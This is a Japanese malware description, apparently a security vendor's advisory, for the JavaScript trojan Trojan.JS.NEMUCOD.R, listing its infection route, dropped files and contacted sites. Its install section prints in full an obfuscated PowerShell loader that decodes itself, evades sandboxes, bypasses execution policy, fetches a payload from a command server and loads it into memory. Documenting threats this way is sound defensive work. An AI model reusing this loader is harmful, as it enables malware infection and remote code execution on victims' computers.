Trojan.JS.NEMUCOD.R

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、以下の悪意あるWebサイトからユーザが誤ってダウンロードすることにより、コンピュータに侵入します。

• https://m{BLOCKED}p.com/j/#{victim's email address}

インストール

マルウェアは、以下のプロセスを追加します。

• "%System%\WScript.exe" "{malware folder}\JP081121000521100210-811021.js"
• "%System%\wscript.exe" //nologo "%Public%\rssvb.js"
• "%System%\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -c "$UuVhb ;$neFmU ;$BIoRQ = $null ;$neFmU = 'ZnVuY3Rpb24galRpZmggew' + '0' + 'KIC' + ' + A + ' + 'gIHBvd2Vyc2hlbGwgLWNvbW1hbmQgIlJlc3RhIi' + 'A' + 'rICJydC1Db21wdXRlci' + 'A' + 'tRm' + ' + 9 + ' + 'yY2UiDQp' + '9' + 'O1N' + '0' + 'YXJ' + '0' + 'LVNs' + 'ZW' + 'VwIC1T' + 'ZW' + 'NvbmRzIDU7IFtTeXN' + '0' + '' + 'ZW' + '' + '0' + 'uTmV' + '0' + 'LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpT' + 'ZW' + 'N1cml' + '0' + 'eVByb3RvY2' + '9' + 'sID' + '0' + 'gW1N5c3RlbS5OZXQuU2VjdXJpdHlQcm' + '9' + '' + '0' + 'b2NvbFR5cGVdOjpUbHMxMjsNCjskT1NwQlQgPSBUZXN' + '0' + 'LUNvbm5lY3Rpb24gJ3d3dy5nb2' + '9' + 'nbGUuY2' + '9' + 'tJy' + 'A' + 'tRXJyb3JBY3Rpb24gU2ls' + 'ZW' + '5' + '0' + 'bHlDb25' + '0' + 'aW51ZTsNCiRFRml5ci' + 'A' + '' + '9' + 'ICRPU3BCVC' + 'A' + 'taXMgW' + '0' + 'FycmF5XTsNCmlmICgkRUZpeXIpew' + '0' + 'KDQp' + '9' + 'DQplbHNlew' + '0' + 'KalRpZmggOw' + '0' + 'KIC' + 'A' + 'gIC' + 'A' + 'gZXhpdDsNCn' + '0' + '7DQoNCiRpTGt2ZC' + 'A' + '' + '9' + 'ICdJbW11bml' + '0' + 'eURlYnVnZ2VyJy' + 'A' + '7DQoNCjtpZigoZ2V' + '0' + 'LXByb2Nlc3MgJ2hhbmRsZScsICdhdXRvJy' + 'A' + 'rICdydW5zYycsICdEYmd2aWV3JywgJ3RjcHZjb24nLC' + 'A' + 'nYW55LnJ1bicsICdhbnkucnVuJywgJ3NhbmRib3gnLC' + 'A' ;$UuVhb = ''+ 'ndGNwdmlldycsICdPTExZREJHJywkaUxrdmQsICdXaXJlJy' + ' + A + ' + 'rICdzaGFyaycsJ2FwYXRlRE5TJywnYW5hbHl6ZScgLWVhIFNpbGVudGx5Q2' + ' + 9 + ' + 'udGludWUpIC1lcS' + 'A' + 'kTnVsbCl7I' + 'A' + '' + '0' + 'KIC' + 'A' + 'gIC' + 'A' + 'gI' + 'A' + '' + '0' + 'KfQ' + '0' + 'K' + 'ZW' + 'xzZXsgDQpqVGlmaC' + 'A' + '7DQogIC' + 'A' + 'gICBleGl' + '0' + 'Ow' + '0' + 'KIH' + '0' + '7W1N5c3RlbS5OZXQuU2VydmljZVBvaW5' + '0' + 'TWFuYWdlcl' + '0' + '6OlNlY3VyaXR5UHJvdG' + '9' + 'jb2wgPSBbU3lzdGVtLk5ldC5T' + 'ZW' + 'N1cml' + '0' + 'eVByb3RvY2' + '9' + 'sVHlwZV' + '0' + '6OlRsczEyIDskakRsdXo7RnVuY3Rpb24geVZlWVV7OyR4T2ZVUy' + 'A' + '' + '9' + 'IFtTeXN' + '0' + '' + 'ZW' + '' + '0' + 'uVGV4dC5FbmNvZGluZ1' + '0' + '6OlVURjguR2V' + '0' + 'U3RyaW5nKFtzeXN' + '0' + '' + 'ZW' + '' + '0' + 'uQ2' + '9' + 'udmVydF' + '0' + '6OkZyb21CYXNlNjRTdHJpbmcoJGpEbHV6KSk7cmV' + '0' + 'dXJuICR4T2ZVUzt' + '9' + 'OyRhd' + '0' + 'xIUi' + 'A' + '' + '9' + 'ICggJ' + '0' + 'M6XFVzZXJzXFB1YmxpY1wnICsgJ3F' + '0' + 'cXJmLnR4dCcpOyRrRUhBdi' + 'A' + '' + '9' + 'ICdhSFIwY' + '0' + 'hNNkx5Jy' + 'A' + 'rICc5aGJtUnlaV1psYkdsd1pXUnZibScgKy' + 'A' + 'nRnpZMmx' + '0' + 'WlRFM' + '0' + '56SXhNamM1TkRFNU5EVXVNREEyTWpFNE5pNXRaWFZ6YVhSbGFHOXpkR2RoZEc5eUxtTnZiUzVpY2k5blEwSlRVM' + '0' + 'JDVTFaS1h6RTBYekF6WD' + 'A' + 'xbGRYTmZRWEp4ZFdsMmIzTkVaVlJsZUhSdkx6QXpMblI' + '0' + 'ZEE' + '9' + 'PScgOyRqRGx1ei' + 'A' + '' + '9' + 'ICRrRUhBdjsgJGtFSEF2ID' + '0' + 'geVZlWVU7JGtFSEF2IHwgT3V' + '0' + 'LUZpbGUgLUZpbGVQYXRoICRhd' + '0' + 'xIUi' + 'A' + 'tRW5jb2RpbmcgJ1VURjgnIC1mb3JjZS' + 'A' + '7JHJIWkp2ID' + '0' + 'gKC' + 'A' + 'nQzpcVXNlcnNcUHVibGljXCcgKy' + 'A' + 'nY3FoY2wudHh' + '0' + 'JykgOyR3eXhscy' + 'A' + '' + '9' + 'IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5X' + 'ZW' + 'JDbGllbnQgOyR3eXhscy5FbmNvZGluZy' + 'A' + '' + '9' + 'IFtTeXN' + '0' + '' + 'ZW' + '' + '0' + 'uVGV4dC5FbmNvZGluZ1' + '0' + '6OlVURjggOyR3eXhscy5I' + 'ZW' + 'FkZXJzLkFkZChbU3lzdGVtLk5ldC5IdHRwUmVxdWVzdEhlYWRlcl' + '0' + '6OkNhY2hlQ2' + '9' + 'udHJvbCwgJ25vLWNhY2hlJykgOyR3eXhscy5I' + 'ZW' + 'FkZXJzLkFkZChbU3lzdGVtLk5ldC5IdHRwUmVxdWVzdEhlYWRlcl' + '0' + '6OlByYWdtYSwgJ25vLWNhY2hlJykgOyR3eXhscy5Qcm' + '9' + '4eS' + 'A' + '' + '9' + 'ICRudWxsIDskYXZ' + '0' + 'VnYgID' + '0' + 'gKCBHZXQtQ2' + '9' + 'udGVudC' + 'A' + 'tUGF' + '0' + 'aC' + 'A' + 'kYXdMSFIgKS' + 'A' + '7JFRsRGR2ID' + '0' + 'gJHd5eGxzLkRvd25sb2FkRGF' + '0' + 'YSggJGF2dFZ2LlRyaW' + '0' + 'oKS' + 'A' + 'pIDskY3JwcGggPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN' + '0' + 'cmluZygkVGxEZHYpOyRjcnBwaC' + 'A' + '' + '9' + 'ICh' + 'A' + 'KFty' + 'ZW' + 'dleF' + '0' + '6OnNwbGl' + '0' + 'KCRjcnBwaCwnXCV4JSsnKSlbMV' + '0' + 'pLlRyaW' + '0' + 'oKTskY3JwcGggfCBPdXQtRmlsZS' + 'A' + 'tRmlsZVBhdGggJHJIWkp2IC1mb3JjZS' + 'A' + '7JEFNSVFmID' + '0' + 'gJ' + '0' + 'xvJy' + 'A' + 'rICdhZCc7JEZLbnNzID' + '0' + 'gJ' + '0' + 'Fzc2UnICsgJ21ibHknOyRPY3ZxaS' + 'A' + '' + '9' + 'ICdpbnYnICsgJ2' + '9' + 'rZSc7JHlEbkRGID' + '0' + 'gJ1JlZmxlJy' + 'A' + 'rICdjdGlvbic7JHVjY3ltID' + '0' + 'gJG51bGw7JGpxY254ICs' + '9' + 'ICckR2tYUEMgPS' + 'A' + 'oJydoIHQgdCBwIHMgOi' + 'A' + 'vIC8nJy5SZXBsYWNlKCcnICcnLC' + 'A' + 'nJycnKS' + 'A' + 'rICcnYW5kcmVm' + 'ZW' + 'xpcGVkb25hc2NpbWUxNzcyMTI3OTQxOTQ1Lj' + 'A' + 'wNjIxODYubWV1c2l' + '0' + '' + 'ZW' + 'hvc3RnYXRvci5jb2' + '0' + 'uYnIvJycgKy' + 'A' + 'nJ2dDQlNTcEJTVkpfMTRfMDNfTWV1c1' + '9' + 'BcnF1aXZvc' + '0' + 'RlVGV4dG8vJycgKy' + 'A' + 'nJ1BlWWVzJycpIDsnIDskanFjbnggKz' + '0' + 'gJyR4dmZ5eC' + 'A' + '' + '9' + 'ICcnJWJhc2U2NCVkSGgwTG14aUwyMXZZeTVoYVhKMWIzSjBjMkZqTG' + '0' + '5bmIyeGhkR' + '0' + 'ZqTHk4NmMzQjBkR2c' + '9' + 'JycgOyR4dmZ5eC' + 'A' + '' + '9' + 'ICcnJWJhc2U2NCUnJy' + 'A' + 'rICgkeHZmeXggLXJlcGxhY2UgJyfmmK/miJEnJy' + 'A' + 'sICcnQScnKS' + 'A' + '7OyRjVEZ6Ti' + 'A' + '' + '9' + 'ICggJydDOlxVc2Vyc1xQdWJsaWNcJycgKy' + 'A' + 'nJ2NxaGNsLnR4dCcnKS' + 'A' + '7JHdjdnl' + '0' + 'ID' + '0' + 'gKEdldC1Db25' + '0' + '' + 'ZW' + '5' + '0' + 'IC1QYXRoICRjVEZ6Ti' + 'A' + 'tRW5jb2RpbmcgVVRGOCk7Jy' + 'A' + '7JGpxY254ICs' + '9' + 'ICckd2N2eXQgLXJlcGxhY2UgJycgJycsICcnJycgOycgOyRqcWNueC' + 'A' + 'rPS' + 'A' + 'nW2J5dGVbXV' + '0' + 'kc2Jza24gPSBbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdFtCeXRlXV' + '0' + '6Om5ldygpOycgOyRqcWNueC' + 'A' + 'rPS' + 'A' + 'nJHNic2tuID' + '0' + 'gKCR3Y3Z5dC' + 'A' + 'gLXNwbGl' + '0' + 'ICcnLCcnIHwgRm' + '9' + 'yRWFjaC1PYmplY3QgeyBbYnl' + '0' + 'ZV' + '0' + 'oJF8uVHJpbSgpKSB' + '9' + 'KS' + 'A' + '7JzskanFjbnggKz' + '0' + 'gJyRUQ1B' + '0' + 'TS' + 'A' + '' + '9' + 'IFtTeXN' + '0' + '' + 'ZW' + '' + '0' + 'uJy' + 'A' + 'rICR5RG5ERi' + 'A' + 'rICcuJy' + 'A' + 'rICRGS25zcy' + 'A' + 'rICddOjonICsgJEFNSVFmICsgJyggJHNic2tuICk7Jy' + 'A' + '7JGpxY254ICs' + '9' + 'ICckem55RFIgPS' + 'A' + 'kVENQdE' + '0' + 'uR2V' + '0' + 'VHlwZSggJydDbGFzc' + '0' + 'xpYnJhcnkzLkNsYXNzMScnICk7Jy' + 'A' + '7JGpxY254ICs' + '9' + 'ICckTG1PUEIgPS' + 'A' + 'kem55RFIuR2V' + '0' + 'TWV' + '0' + 'aG' + '9' + 'kKC' + 'A' + 'nJ3ByRlZJJycgKS4nICsgJE' + '9' + 'jdnFpICsgJyggJHVjY3ltICwgW2' + '9' + 'iamVjdFtdXS' + 'A' + 'oICR4dmZ5eC' + 'A' + 'sICcnJX' + 'ZW' + 'bEd6JScnICwgJydEIEREQzpcV2luZG' + '9' + '3c1xNaWNyb3NvZnQuTkVUXEZyYW1ld2' + '9' + 'ya1x2NC4wLjMwMzE5XGluc3RhbGx1dGlsJycsICcnJHRydWUnJywgJEdrWFBDICkgKTsnIDskek' + '9' + 'Ga1QgPS' + 'A' + 'oICdDOlxVc2Vyc1xQdWJsaWNcJy' + 'A' + 'rICdjbGRiZF8wMS5wczEnICkgOyRqcWNueCB8IE' + '9' + '1dC1GaWxlIC1GaWxlUGF' + '0' + 'aC' + 'A' + 'kek' + '9' + 'Ga1QgLWZvcmNlIDtTdGFydC1TbGVlcC' + 'A' + 'tcy' + 'A' + '1Oztwb3dlcnNo' + 'ZW' + 'xsIC1FeGVjdXRpb25Qb2xpY3kgYnlwYXNzIC1GaWxlICR6T' + '0' + 'ZrVC' + 'A' + '7' ;$byvhw = ($neFmU + $UuVhb) ;$byvhw = $byvhw.replace('''',$BIoRQ) ;$byvhw = $byvhw.replace('+ ',$BIoRQ) ;$byvhw = $byvhw.replace(' ',$BIoRQ) ;Function vvHhm{;$mCuKn = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String( $byvhw ));return $mCuKn;};$ErsWF = vvHhm; $ErsWF = ($ErsWF -replace '%vVlGz%','C:\Users\Public\rssvb的这五js') ;$GHwJu = 'C:\Users\Public\chgtx.p' + 's1' ; $ErsWF | Out-File -FilePath $GHwJu -force ; powershell -ExecutionPolicy Bypass -file $GHwJu ; ";
• "%System%\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file %Public%\chgtx.ps1
• "%System%\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -File %Public%\cldbd_01.ps1

(註：%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.. %Public%フォルダは、すべてのユーザ共通のファイルまたはフォルダのリポジトリとして機能するフォルダです。Windows Vista、7、8の場合、通常 "C:\Users\Public" です。)

マルウェアは、以下のフォルダを作成します。

• %AppDataLocal%\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

(註：%AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local" です。)

作成活動

マルウェアは、以下のファイルを作成します。

• %User Temp%\{8 random characters}.{3 random characters}.ps1 → deleted afterwards
• %User Temp%\{8 random characters}.{3 random characters}.psm1 → deleted afterwards
• %Public%\chgtx.ps1 → loader script; drops other components
• %Public%\qtqrf.txt → contains decoded C2 URL
• %Public%\cqhcl.txt → contains payload
• %Public%\cldbd_01.ps1 → loads payload from cqhcl.txt into memory
• %Public%\rssvb.js → copy of itself (if original path contains "Downloads" or "Temp" then it drops a copy of itself inside %Public% folder.)

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %Public%フォルダは、すべてのユーザ共通のファイルまたはフォルダのリポジトリとして機能するフォルダです。Windows Vista、7、8の場合、通常 "C:\Users\Public" です。)

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

• http://ctldl.{BLOCKED}e.com
• https://{BLOCKED}r.com.br/gCBSSpBSVJ_14_03_Meus_ArquivosDeTexto/03.txt
• https://{BLOCKED}r.com.br/gCBSSpBSVJ_14_03_Meus_ArquivosDeTexto/PeYes
• https://c{BLOCKED}a.com/bl.txt

<補足>
侵入方法

マルウェアは、以下の悪意あるWebサイトからユーザが誤ってダウンロードすることにより、コンピュータに侵入します。

• https://m{BLOCKED}p.com/j/#{被害者の電子メールアドレス}

作成活動

マルウェアは、以下のファイルを作成します。

• %User Temp%\{ランダムな8文字}.{ランダムな3文字}.ps1 → 後に削除される
• %User Temp%\{ランダムな8文字}.{ランダムな3文字}.psm1 → 後に削除される
• %Public%\chgtx.ps1 → 別のコンポーネントを作成するローダのスクリプト
• %Public%\qtqrf.txt → C&CサーバのURL（デコードされている）を含む
• %Public%\cqhcl.txt → ペイロードを含む
• %Public%\cldbd_01.ps1 → cqhcl.txtからメモリ内にペイロードを読み込む
• %Public%\rssvb.js → 自身のコピー（元のパスに「Downloads」または「Temp」が含まれている場合、%Public%フォルダ内に自身のコピーを作成する）